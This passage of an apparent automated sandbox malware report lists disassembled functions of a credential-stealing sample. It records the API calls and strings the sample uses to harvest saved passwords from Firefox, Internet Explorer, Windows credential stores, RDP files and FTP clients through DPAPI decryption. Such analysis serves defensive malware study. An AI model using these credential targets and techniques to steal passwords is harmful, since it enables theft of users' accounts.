                  • Instruction Fuzzy Hash: 3FB0923161020836EA10A2958C439DA72AD4748708F4002A12A59D12C2EAEAEAC046EA
                  Function 00401011 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                  Download Yara Rule
                  APIs
                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00401018
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID:
                  • API String ID: 2244384528-0
                  • Opcode ID: 86a8ec1850b9aaa514b9e5e89e8c94cfed7fea3bececbbbc2fb57b3281181469
                  • Instruction ID: 28e71356e360ca3db6ee0d43e78b0f0bf00f1f89270a16bc3e7bce26a30f1f77
                  • Opcode Fuzzy Hash: 86a8ec1850b9aaa514b9e5e89e8c94cfed7fea3bececbbbc2fb57b3281181469
                  • Instruction Fuzzy Hash: 27A022323C020032EE00AB80AC03FCC2C020BA8B8CF00C002BB082C0C0C8FAC0E2A22A
                  Function 00401752 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLocal
                  • String ID:
                  • API String ID: 2826327444-0
                  • Opcode ID: 137a773f6ae48b6ee33adf6dcf8c71acbe3b08eb172555d78977b267df3d9f64
                  • Instruction ID: 0a405eb3ea2237b8c7d3b2374792eb0735da3c41d5461f0553682d87d0295bc0
                  • Opcode Fuzzy Hash: 137a773f6ae48b6ee33adf6dcf8c71acbe3b08eb172555d78977b267df3d9f64
                  • Instruction Fuzzy Hash: C5C02B3100010D91C7113E34C949B4A39C4572034CF0080323508A08F0C678C690C1C8
                  Function 00401769 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                  Download Yara Rule
                  APIs
                  • LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocLocal
                  • String ID:
                  • API String ID: 3494564517-0
                  • Opcode ID: 175009169b3b3cea6a064c991676caba20ef80de107dd71c414f8110d5986276
                  • Instruction ID: 0d23249a0e78e6512e579298220552806d91460745143d34d93349aebd84a825
                  • Opcode Fuzzy Hash: 175009169b3b3cea6a064c991676caba20ef80de107dd71c414f8110d5986276
                  • Instruction Fuzzy Hash: 84B092A120030826E250A649D803F1AB28C9B11B4CF008032BB44E62C2C9B8F91481AD

                  Non-executed Functions

                  Function 00409414 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 169filestringCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00409484
                  • lstrcmpiA.KERNEL32(00411EA6,?), ref: 004094B1
                  • lstrcmpiA.KERNEL32(00411EA8,?), ref: 004094CE
                  • FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409664
                  • FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409677
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                  • API String ID: 3040542784-1405255088
                  • Opcode ID: f0f0ab89c6ef816c1f5cdb2bcce169c3b320ecfc182607a20e6cbbfd06447570
                  • Instruction ID: f078e26bfb360da23a87b834dff21d2cd796a551ffced0913c93ca374c7af2dc
                  • Opcode Fuzzy Hash: f0f0ab89c6ef816c1f5cdb2bcce169c3b320ecfc182607a20e6cbbfd06447570
                  • Instruction Fuzzy Hash: DC513F70914209BADF21BF61DD02EEA7A75AF04308F1044B7B908B11F2D7BE9E919B5D
                  Function 00402ABC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 105COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: explorer.exe
                  • API String ID: 0-3187896405
                  • Opcode ID: c2717998afd40274a0e18a5117ed09a6326ae842430f85bb60fcf48e658aaa65
                  • Instruction ID: 339f67933faa4902912e8113d0e12cd211fbe269d324ef67944da57c1fce070e
                  • Opcode Fuzzy Hash: c2717998afd40274a0e18a5117ed09a6326ae842430f85bb60fcf48e658aaa65
                  • Instruction Fuzzy Hash: 7C317230A04218ABEF229BA1DE49BEE7AB5AB04344F0045B7E104B11E1DBF95E84DF59
                  Function 0040FCA6 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 140COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 123456
                  • API String ID: 0-158520161
                  • Opcode ID: 2c5fbe4573f16d8fab2cf4876be527e79393b4457eed74dee052666c98a27ef3
                  • Instruction ID: 885172f44155ff4289d4fb693edf733573c9f98d175cf26bc1040d56c290aa1b
                  • Opcode Fuzzy Hash: 2c5fbe4573f16d8fab2cf4876be527e79393b4457eed74dee052666c98a27ef3
                  • Instruction Fuzzy Hash: B6514F31900209EAEF219F91DD46BDDBFB5FF04348F148076E600B55E2D7B98A48DB68
                  Function 0040A139 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 105stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00409E8B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409EC4
                    • Part of subcall function 00409E8B: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409ECD
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A16D
                  • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A1F7
                  • lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0040A216
                  • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0040A235
                  • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A24E
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A294
                  • LocalFree.KERNEL32(?), ref: 0040A2C1
                  • CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A2EB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
                  • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                  • API String ID: 2957877119-3076635702
                  • Opcode ID: feb5cb5b94d68b1118f19efbded5a9befba7026c3d79461e7fe2bf79bfc015a0
                  • Instruction ID: f401766838be715e7df61eb103f318295b24ae2e2e23771a2c77150a89ec6b22
                  • Opcode Fuzzy Hash: feb5cb5b94d68b1118f19efbded5a9befba7026c3d79461e7fe2bf79bfc015a0
                  • Instruction Fuzzy Hash: 2A41097190021DEADF219F50CC06FDA7BB9BF08304F0480EAB644B5191DB7A9AE59FD9
                  Function 0040B818 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040B8CF
                  • LocalFree.KERNEL32(00000000,?), ref: 0040B90A
                  • lstrlen.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040B94B
                  • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040B959
                  • lstrlen.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040B967
                  • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040B975
                  • lstrlen.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040B983
                  • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040B991
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$CryptDataFreeLocalUnprotect
                  • String ID: ftp://$http://$https://
                  • API String ID: 3968356742-2804853444
                  • Opcode ID: cc6fa941d3240ba3dffb52b22ee328574de5633c9d4cb607f2d79f4d50549dae
                  • Instruction ID: b19ace0abd7eac20551f2d5fc40b49bbbced65cf98b86b072bc85626dd3b29c5
                  • Opcode Fuzzy Hash: cc6fa941d3240ba3dffb52b22ee328574de5633c9d4cb607f2d79f4d50549dae
                  • Instruction Fuzzy Hash: BF51E672900109FACF12AFD1EC42EEE7B7AEB44309F108037F611B50A1D77A5A54DB59
                  Function 00408543 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104filestringCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 004085B3
                  • lstrcmpiA.KERNEL32(00411EA6,?), ref: 004085DC
                  • lstrcmpiA.KERNEL32(00411EA8,?), ref: 004085F9
                  • FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 004086A0
                  • FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 004086B3
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$\*.*
                  • API String ID: 3040542784-1692270452
                  • Opcode ID: dee79c63cfed158fb1c5fb456c9f386bd851ae0be0562eccb3adeea9a6142c65
                  • Instruction ID: de00ff37c846c8476ad0b937f69e9334585cc62ec1e68734680259d3cbd4a832
                  • Opcode Fuzzy Hash: dee79c63cfed158fb1c5fb456c9f386bd851ae0be0562eccb3adeea9a6142c65
                  • Instruction Fuzzy Hash: 69314470500209AADF11AB61DD01EEE77B9AF04304F1049BBB948B51F1DB799ED09A58
                  Function 0040A54F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 88stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A5C1
                  • lstrlenW.KERNEL32(00413275,?,?,00000000), ref: 0040A5FF
                  • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A62F
                  • LocalFree.KERNEL32(00000000), ref: 0040A661
                  • CredFree.ADVAPI32(00000000), ref: 0040A67F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
                  • String ID: Microsoft_WinInet_*$u2A
                  • API String ID: 3891647360-1717749884
                  • Opcode ID: f2b9b52f09b627ba91158a8d4e26bef8a4bcd467c37c94d826325fd16cc1659b
                  • Instruction ID: a7d8e005c27115d7c2d26dd6ef0ae6fc1f38b51df9cf3295d8c3d9fd3ebbafd4
                  • Opcode Fuzzy Hash: f2b9b52f09b627ba91158a8d4e26bef8a4bcd467c37c94d826325fd16cc1659b
                  • Instruction Fuzzy Hash: B5312B71800209EADF209F90DC05BEEBBB8BB04305F184576E641B12E0D7BA5A94CB9A
                  Function 0040CA1F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(00000000), ref: 0040CAC4
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CB2A
                  • LocalFree.KERNEL32(00000000), ref: 0040CB51
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptDataFreeLocalUnprotectlstrlen
                  • String ID: full address:s:$password 51:b:$username:s:
                  • API String ID: 2920030623-2945746679
                  • Opcode ID: 5a4aa130149a7864f96d2caa5a8bd5db8e6769597c0901092ac328538414656e
                  • Instruction ID: fa303a7f78ff015c66e7f5f047ee1bd5f96a69690f6c653c9b76103944328498
                  • Opcode Fuzzy Hash: 5a4aa130149a7864f96d2caa5a8bd5db8e6769597c0901092ac328538414656e
                  • Instruction Fuzzy Hash: 93415C32D00109EADF21ABE5D846BEEBB75EB44314F10013BF200711E0D7B95A92DB9D
                  Function 0040A706 Relevance: 4.6, APIs: 3, Instructions: 121stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?), ref: 0040A71B
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A7D3
                  • LocalFree.KERNEL32(00000000), ref: 0040A806
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptDataFreeLocalUnprotectlstrlen
                  • String ID:
                  • API String ID: 2920030623-0
                  • Opcode ID: 8c3423fde507b97bc5dc80952f4c4f7a43aaee8c73ae507500d09105da1b5f30
                  • Instruction ID: 83b7a2fcf0e51bbc56470a161055dde31258554073f6f43092e3c13268cc997d
                  • Opcode Fuzzy Hash: 8c3423fde507b97bc5dc80952f4c4f7a43aaee8c73ae507500d09105da1b5f30
                  • Instruction Fuzzy Hash: 0E31B3376002099BEF20AE54D844BCEB775EB85364F10C137EA50A72C0D27CDA56CB5E
                  Function 004040EF Relevance: 4.6, APIs: 3, Instructions: 51memoryCOMMON
                  Download Yara Rule
                  APIs
                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040414E
                  • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0040416A
                  • FreeSid.ADVAPI32(?), ref: 0040417E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateCheckFreeInitializeMembershipToken
                  • String ID:
                  • API String ID: 3429775523-0
                  • Opcode ID: 8875248de65d89068c49fc9c91a7eb01479aeaa87efd2b03388409123db240e4
                  • Instruction ID: fcca649b5c9b222fb78caba8243c0119fbbb0da3718ef36efae507d1f91828ab
                  • Opcode Fuzzy Hash: 8875248de65d89068c49fc9c91a7eb01479aeaa87efd2b03388409123db240e4
                  • Instruction Fuzzy Hash: E0116170604288DEEB11CB94DC0EFDA7FF4AB5034CF0885A5D250EA2F2D3B89548C75A
                  Function 00403FF9 Relevance: 3.1, APIs: 2, Instructions: 57encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404045
                  • LocalFree.KERNEL32(00000000), ref: 00404079
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptDataFreeLocalUnprotect
                  • String ID:
                  • API String ID: 1561624719-0
                  • Opcode ID: 1d3115f653053ecefc300207beb17d1587e5c5b299ee93d5987816e0cda49adf
                  • Instruction ID: 002495ce28a5764f73250fbc4ec026de7f96150d115926febcdcd66189658153
                  • Opcode Fuzzy Hash: 1d3115f653053ecefc300207beb17d1587e5c5b299ee93d5987816e0cda49adf
                  • Instruction Fuzzy Hash: FE110775A00219EBDB15CE94C845BDE7B74FB44351F008466A611762E0C3B9AA40CB45
                  Function 00402CD2 Relevance: .5, Instructions: 529COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
                  • Instruction ID: 3c78efb6b6252997e37dba53990d4c41ba62dc3b41e308827f1f696989bfbd42
                  • Opcode Fuzzy Hash: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
                  • Instruction Fuzzy Hash: 8B121E73405A015BE75DCE2ECCC0692B3E3BBD826435BD63DC46AC3A45FE74B61A8648
                  Function 004104C9 Relevance: .2, Instructions: 225COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 03deaa5e7ac288ae455c8890013846e685306e418c958c7845be627a36af68f0
                  • Instruction ID: fef48ed7f26f4b91a03165647bc533b2e212d921c779cbc8725f1bb403e01c98
                  • Opcode Fuzzy Hash: 03deaa5e7ac288ae455c8890013846e685306e418c958c7845be627a36af68f0
                  • Instruction Fuzzy Hash: 1D71C137F505364BE7588DAA8981195F7D2ABC8320B1F827ECE19F7381C9B4BD1286C4
                  Function 004090BA Relevance: 36.2, APIs: 16, Strings: 8, Instructions: 238COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
                  • API String ID: 0-1526611526
                  • Opcode ID: 75be8d959a3ef46cda475649a3b2f5335f473a6aae9f3cf828271b51f02723bf
                  • Instruction ID: 20c96ff4ef7ca75ed0c1a3f9f91715f39d6713f9170a09e911abe15c08339f7d
                  • Opcode Fuzzy Hash: 75be8d959a3ef46cda475649a3b2f5335f473a6aae9f3cf828271b51f02723bf
                  • Instruction Fuzzy Hash: F291F670904109EADF21AFA1DD46BAEBEB5AF04308F20403BF501751E2D7BE4E959B59
                  Function 00408E4D Relevance: 22.7, APIs: 8, Strings: 7, Instructions: 165COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
                  • API String ID: 0-3560805513
                  • Opcode ID: 545cff59d4eda7f766d5b0df4497bf5a85fcbd4fc8714724cf6a74084cb58ec7
                  • Instruction ID: e95dfbb8d8d990a8ab6e0530343e41f76290cb4ce0cde13c720cf05920f077ce
                  • Opcode Fuzzy Hash: 545cff59d4eda7f766d5b0df4497bf5a85fcbd4fc8714724cf6a74084cb58ec7
                  • Instruction Fuzzy Hash: 13511470940109BADF11ABA1CE06AEE7E75AF14309F10443BF541B01E2DBBD4AA1DB5D
                  Function 0040A820 Relevance: 21.2, APIs: 7, Strings: 7, Instructions: 178COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • wsprintfA.USER32 ref: 0040A88C
                  • wsprintfA.USER32 ref: 0040A89F
                  • wsprintfA.USER32 ref: 0040A8B2
                  • wsprintfA.USER32 ref: 0040A8C5
                  • wsprintfA.USER32 ref: 0040A8D8
                  • wsprintfA.USER32 ref: 0040A8EB
                  • wsprintfA.USER32 ref: 0040A8FE
                    • Part of subcall function 0040A706: lstrlen.KERNEL32(?), ref: 0040A71B
                    • Part of subcall function 0040A706: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A7D3
                    • Part of subcall function 0040A706: LocalFree.KERNEL32(00000000), ref: 0040A806
                    • Part of subcall function 00401548: lstrlen.KERNEL32(00000000), ref: 00401554
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
                  • String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
                  • API String ID: 3846021373-1012938452
                  • Opcode ID: 2526abd854f4923f605afca51e82ce3a5495784b67bfd747cbcfbb8de1c7722a
                  • Instruction ID: dc9777ff7e0b01a33503325bf57cf66e7db019083ebb8df2e8b3fd290b5606e8
                  • Opcode Fuzzy Hash: 2526abd854f4923f605afca51e82ce3a5495784b67bfd747cbcfbb8de1c7722a
                  • Instruction Fuzzy Hash: D1617371940208FBDF527FA1DD42AEDBB72AF04708F14803AF611351B2DB7A5A60EB59
                  Function 0040F127 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00409E8B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409EC4
                    • Part of subcall function 00409E8B: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409ECD
